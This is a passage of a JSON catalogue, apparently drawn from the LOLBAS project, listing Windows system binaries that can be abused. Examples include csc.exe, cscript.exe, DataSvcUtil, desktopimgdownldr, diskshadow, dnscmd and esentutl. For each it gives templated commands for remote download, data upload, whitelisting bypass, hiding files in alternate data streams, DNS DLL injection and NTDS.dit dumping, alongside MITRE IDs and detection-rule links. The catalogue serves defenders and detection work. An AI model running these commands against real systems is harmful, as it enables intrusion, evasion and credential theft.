mechanism","mitre":["T1218.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\control.exe","C:\\Windows\\SysWOW64\\control.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"Control.exe executing files from alternate data streams"},{"type":"IOC","value":"Control.exe executing library file without cpl extension"},{"type":"IOC","value":"Suspicious network connections from control.exe"}],"references":["https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/","https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/","https://twitter.com/bohops/status/955659561008017409","https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items","https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/","https://lolbas-project.github.io/lolbas/Binaries/Control/"]},{"id":"lolbas:control-exe:1","toolId":"lolbas:control-exe","toolName":"Control.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"control.exe {PATH_ABSOLUTE:.cpl}","description":"Execute .cpl file. A CPL is a DLL file with CPlApplet export function)","usecase":"Use to execute code and bypass application whitelisting","mitre":["T1218.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\control.exe","C:\\Windows\\SysWOW64\\control.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"Control.exe executing files from alternate data streams"},{"type":"IOC","value":"Control.exe executing library file without cpl extension"},{"type":"IOC","value":"Suspicious network connections from control.exe"}],"references":["https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/","https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/","https://twitter.com/bohops/status/955659561008017409","https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items","https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/","https://lolbas-project.github.io/lolbas/Binaries/Control/"]},{"id":"lolbas:csc-exe:0","toolId":"lolbas:csc-exe","toolName":"Csc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"csc.exe -out:{PATH:.exe} {PATH:.cs}","description":"Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to the specified .exe path.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml"},{"type":"IOC","value":"Csc.exe should normally not run as System account unless it is used for development."}],"references":["https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/","https://lolbas-project.github.io/lolbas/Binaries/Csc/"]},{"id":"lolbas:csc-exe:1","toolId":"lolbas:csc-exe","toolName":"Csc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"csc -target:library {PATH:.cs}","description":"Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to a DLL file with the same name.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml"},{"type":"IOC","value":"Csc.exe should normally not run as System account unless it is used for development."}],"references":["https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/","https://lolbas-project.github.io/lolbas/Binaries/Csc/"]},{"id":"lolbas:cscript-exe:0","toolId":"lolbas:cscript-exe","toolName":"Cscript.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs","description":"Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cscript.exe","C:\\Windows\\SysWOW64\\cscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Cscript.exe executing files from alternate data streams"},{"type":"IOC","value":"DotNet CLR libraries loaded into cscript.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cscript.exe.log"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Cscript/"]},{"id":"lolbas:customshellhost-exe:0","toolId":"lolbas:customshellhost-exe","toolName":"CustomShellHost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"CustomShellHost.exe","description":"Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder.","usecase":"Can be used to evade defensive counter-measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\CustomShellHost.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"CustomShellHost.exe is unlikely to run on normal workstations"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml"}],"references":["https://twitter.com/YoSignals/status/1381353520088113154","https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher","https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/"]},{"id":"lolbas:datasvcutil-exe:0","toolId":"lolbas:datasvcutil-exe","toolName":"DataSvcUtil.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL}","description":"Upload file, credentials or data exfiltration in general","usecase":"Upload file","mitre":["T1567"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml"},{"type":"IOC","value":"The DataSvcUtil.exe tool is installed in the .NET Framework directory."},{"type":"IOC","value":"Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil."}],"references":["https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe","https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services","https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services","https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/"]},{"id":"lolbas:desktopimgdownldr-exe:0","toolId":"lolbas:desktopimgdownldr-exe","toolName":"Desktopimgdownldr.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"set \"SYSTEMROOT=C:\\Windows\\Temp\" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr","description":"Downloads the file and sets it as the computer's lockscreen","usecase":"Download arbitrary files from a web server","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\desktopimgdownldr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml"},{"type":"IOC","value":"desktopimgdownldr.exe that creates non-image file"},{"type":"IOC","value":"Change of HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP\\LockScreenImageUrl"}],"references":["https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/","https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/"]},{"id":"lolbas:devicecredentialdeployment-exe:0","toolId":"lolbas:devicecredentialdeployment-exe","toolName":"DeviceCredentialDeployment.exe","name":"Conceal","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Conceal"],"command":"DeviceCredentialDeployment","description":"Grab the console window handle and set it to hidden","usecase":"Can be used to stealthily run a console application (e.g. cmd.exe) in the background","mitre":["T1564"],"privilege":"user","fullPath":["C:\\Windows\\System32\\DeviceCredentialDeployment.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"DeviceCredentialDeployment.exe should not be run on a normal workstation"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/"]},{"id":"lolbas:dfsvc-exe:0","toolId":"lolbas:dfsvc-exe","toolName":"Dfsvc.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}","description":"Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)","usecase":"Use binary to bypass Application whitelisting","mitre":["T1127.002"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe","https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/"]},{"id":"lolbas:diantz-exe:0","toolId":"lolbas:diantz-exe","toolName":"Diantz.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab","description":"Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","usecase":"Hide data compressed into an Alternate Data Stream.","mitre":["T1564.004"],"privilege":"user","fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"type":"IOC","value":"diantz storing data into alternate data streams."},{"type":"IOC","value":"diantz getting a file from a remote machine or the internet."}],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"]},{"id":"lolbas:diantz-exe:1","toolId":"lolbas:diantz-exe","toolName":"Diantz.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}","description":"Download and compress a remote file and store it in a CAB file on local machine.","usecase":"Download and compress into a cab file.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"type":"IOC","value":"diantz storing data into alternate data streams."},{"type":"IOC","value":"diantz getting a file from a remote machine or the internet."}],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"]},{"id":"lolbas:diantz-exe:2","toolId":"lolbas:diantz-exe","toolName":"Diantz.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"diantz /f {PATH:.ddf}","description":"Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.","usecase":"Bypass command-line based detections","mitre":["T1036"],"privilege":"user","fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"type":"IOC","value":"diantz storing data into alternate data streams."},{"type":"IOC","value":"diantz getting a file from a remote machine or the internet."}],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"]},{"id":"lolbas:diskshadow-exe:0","toolId":"lolbas:diskshadow-exe","toolName":"Diskshadow.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"diskshadow.exe /s {PATH:.txt}","description":"Execute commands using diskshadow.exe from a prepared diskshadow script.","usecase":"Use diskshadow to exfiltrate data from VSS such as NTDS.dit","mitre":["T1003.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\diskshadow.exe","C:\\Windows\\SysWOW64\\diskshadow.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Child process from diskshadow.exe"}],"references":["https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/","https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"]},{"id":"lolbas:diskshadow-exe:1","toolId":"lolbas:diskshadow-exe","toolName":"Diskshadow.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"diskshadow> exec {PATH:.exe}","description":"Execute commands using diskshadow.exe to spawn child process","usecase":"Use diskshadow to bypass defensive counter measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\diskshadow.exe","C:\\Windows\\SysWOW64\\diskshadow.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Child process from diskshadow.exe"}],"references":["https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/","https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"]},{"id":"lolbas:dnscmd-exe:0","toolId":"lolbas:dnscmd-exe","toolName":"Dnscmd.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll}","description":"Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.","usecase":"Remotely inject dll to dns server","mitre":["T1543.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\Dnscmd.exe","C:\\Windows\\SysWOW64\\Dnscmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml"},{"type":"IOC","value":"Dnscmd.exe loading dll from UNC/arbitrary path"}],"references":["https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83","https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html","https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp","https://twitter.com/Hexacorn/status/994000792628719618","http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html","https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/"]},{"id":"lolbas:esentutl-exe:0","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o","description":"Copies the source VBS file to the destination VBS file.","usecase":"Copies files from A to B","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"]},{"id":"lolbas:esentutl-exe:1","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o","description":"Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.","usecase":"Copy file and hide it in an alternate data stream as a defensive counter measure","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"]},{"id":"lolbas:esentutl-exe:2","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o","description":"Copies the source Alternate Data Stream (ADS) to the destination EXE.","usecase":"Extract hidden file within alternate data streams","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"]},{"id":"lolbas:esentutl-exe:3","toolId":"lolbas:esentutl-exe","tool